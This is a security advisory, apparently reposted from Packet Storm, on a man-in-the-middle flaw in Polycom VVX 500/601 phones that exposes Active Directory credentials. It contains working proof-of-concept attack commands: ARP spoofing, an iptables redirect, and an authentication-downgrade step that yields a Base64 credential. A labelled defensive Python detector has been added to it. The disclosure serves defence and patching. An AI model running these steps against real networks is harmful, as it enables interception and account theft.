Packet Storm ID: PACKETSTORM:149939
Polycom VVX 500 / VVX 601 5.8.0.12848 Man-In-The-Middle

2018-10-24 00:00:00
Micha Borrmann
packetstormsecurity.com

EPSS: 0.002 (percentile: 58.7%)

Advisory ID: SYSS-2018-027  
Product: VVX 500 / VVX 601  
Manufacturer: Polycom  
Affected Version(s): <= 5.8.0.12848  
Tested Version(s): 5.4.0.10182, 5.8.0.12848  
Vulnerability Type: X.509 validation - Man-in-the-Middle (CWE-300)  
Risk Level: Medium  
Solution Status: Open  
Manufacturer Notification: 2018-08-29  
Solution Date: 20??-??-??  
Public Disclosure: 2018-10-23  
CVE Reference: CVE-2018-18568  
Author of Advisory: Micha Borrmann (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
If a Polycom VVX 500/601 [1] is used in an on-premises Skype for  
Business installation, the phone stores the credentials of an Active  
Directory account. By performing a man-in-the-middle attack, an  
attacker can make the phone hand over these credentials, and the  
account is therefore compromised.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The phone sends the stored credentials via HTTPS to a web site usually  
named autodiscover, but it performs no X.509 certificate validation, so  
the TLS connection can be intercepted. The credentials are sent using  
the challenge-response NetNTLM algorithm. After a downgrade attack to  
HTTP basic authentication, the credentials can be harvested in  
Base64-encoded form.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
Burp Suite is used as an invisible proxy.  
  
Perform an ARP spoofing attack against the phone so that its data  
traffic is routed to the device on which Burp Suite is running. All  
attacks are started from that same device.  
  
# arpspoof -i eth0 -t 192.168.100.101 192.168.100.1  
  
Set an iptables rule so that the phone's HTTPS traffic is redirected to Burp Suite, for example:  
  
# iptables -A PREROUTING -t nat -i eth0 -s 192.168.100.101 -p tcp --dport 443 -j REDIRECT --to-port 8080  
  
Enable rules in Burp Suite that suppress these two response headers:  
  
WWW-Authenticate: Negotiate  
WWW-Authenticate: NTLM  
  
With these headers removed, an authentication downgrade attack is in place as well.  
  
Watch the proxy history for an HTTP POST request like the following:  
  
POST /autodiscover/autodiscover.xml HTTP/1.1  
Content-Type: text/xml; charset=utf-8  
Content-Length: 454  
Connection: close  
Accept-Encoding: gzip, deflate  
Accept-Language: en,*  
User-Agent: Mozilla/5.0  
Host: autodiscover.example.com  
Authorization: Basic ZXhhbXBsZVxBRGFjY291bnRuYW1lOnZlcnl0b3BzZWNyZXRwYXNzd29yZA==  
  
Decode the harvested Base64 encoded credential information.  
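As an added defender-side example (not part of the SySS advisory), the following Python check runs over one captured request/response pair of the shape shown above and flags both signs of this attack: a Basic Authorization header carrying a domain account towards an autodiscover path, and a 401 that offers Basic while the Negotiate/NTLM challenges are missing. The sample messages are constructed; only the domain\user part of the credential is reported, never the password.

```python
import base64

# Constructed sample request, shaped like the PoC request above (dummy credential value).
SAMPLE_REQUEST = (
    "POST /autodiscover/autodiscover.xml HTTP/1.1\r\n"
    "Host: autodiscover.example.com\r\n"
    "Authorization: Basic ZXhhbXBsZVxBRGFjY291bnRuYW1lOnZlcnl0b3BzZWNyZXRwYXNzd29yZA==\r\n"
    "\r\n"
)
# Constructed sample 401 as a downgrading proxy delivers it: Basic only, Negotiate/NTLM stripped.
SAMPLE_DOWNGRADED_RESPONSE = 'HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic realm="autodiscover"\r\n\r\n'

def parse_headers(message):
    """Return (start line, {lowercased name: [values]}) for one HTTP message."""
    lines = message.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers

def basic_auth_principal(headers):
    """DOMAIN\\user from a Basic Authorization header; the password part is discarded."""
    for value in headers.get("authorization", []):
        scheme, _, token = value.partition(" ")
        if scheme.lower() == "basic":
            try:
                decoded = base64.b64decode(token, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                return None  # malformed token: nothing to report
            return decoded.split(":", 1)[0]
    return None

def offers_only_basic(headers):
    """True if the challenge offers Basic but neither Negotiate nor NTLM (downgrade indicator)."""
    schemes = {v.split(" ", 1)[0].lower() for v in headers.get("www-authenticate", [])}
    return "basic" in schemes and not (schemes & {"negotiate", "ntlm"})

def analyze(request, response):
    """Findings for one request/response pair, e.g. taken from proxy logs or a PCAP."""
    start, req_headers = parse_headers(request)
    _, resp_headers = parse_headers(response)
    path = start.split(" ")[1] if " " in start else ""
    findings = []
    principal = basic_auth_principal(req_headers)
    if principal and "autodiscover" in path.lower():
        findings.append(f"Basic credential for {principal} sent to {path} (plaintext-equivalent)")
    if offers_only_basic(resp_headers):
        findings.append("401 offers Basic only; Negotiate/NTLM challenges missing (downgrade)")
    return findings
```

In a monitoring pipeline the same two checks can be applied to every 401 and every Authorization header seen towards the autodiscover host; a phone with working certificate validation never produces either finding.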
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
Install the new firmware, which integrates a trust store and enforces a  
strict X.509 certificate validation policy.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2018-08-13: Detection of the vulnerability  
2018-08-29: Vulnerability reported to manufacturer  
2018-10-22: CVE number assigned  
2018-10-23: Public release of the security advisory  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
[1] Product web sites for the phones  
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html  
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html  
[2] SySS Security Advisory SYSS-2018-027  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-027.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Micha Borrmann of SySS GmbH.  
  
E-Mail: micha.borrmann (at) syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc  
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory  
may be updated in order to provide as accurate information as  
possible. The latest version of this security advisory is available on  
the SySS Web site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
